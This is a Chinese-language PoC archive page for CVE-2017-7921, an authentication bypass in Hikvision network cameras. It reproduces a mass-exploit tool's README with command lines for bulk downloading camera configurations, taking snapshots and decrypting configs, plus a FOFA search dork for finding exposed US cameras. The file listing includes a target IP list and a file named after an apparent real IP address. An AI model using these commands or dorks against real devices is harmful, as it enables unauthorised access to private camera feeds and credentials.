关联漏洞
标题:
多款Hikvision产品安全漏洞
(CVE-2017-7921)
描述:Hikvision DS-2CD2xx2F-I Series等都是中国海康威视(Hikvision)公司的网络摄像头产品。 多款Hikvision产品中存在身份验证漏洞。攻击者可利用该漏洞提升权限,获取敏感信息的访问权限。以下产品和版本受到影响:Hikvision DS-2CD2xx2F-I Series 5.2.0 build 140721版本至5.4.0 build 160530版本;DS-2CD2xx0F-I Series 5.2.0 build 140721版本至5.4.0 Build 16040
介绍
# cve-2017-7921-Mass-Exploit
# Mass Config Download
python3 download.py -i ip -s -v
# Mass Snapshot Taker
python3 snapshot.py -i ip -s -v
# Config Decrypt
python3 decrypt.py file-name
# Default port is 80
# Change port in both code download.py , snapshot.py
# file contain only ip
# Fofa Dork
"App-webs" && server=="App-webs/" && port="80" && country="US" && icon_hash="999357577"
文件快照
[4.0K] /data/pocs/d82359a1b0711d4dd4a6e91c29fdc82144998e94
├── [868K] 23.240.208.13
├── [1.2K] decrypt.py
├── [2.3K] download.py
├── [ 41K] ip
├── [ 391] README.md
└── [2.4K] snapshot.py
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。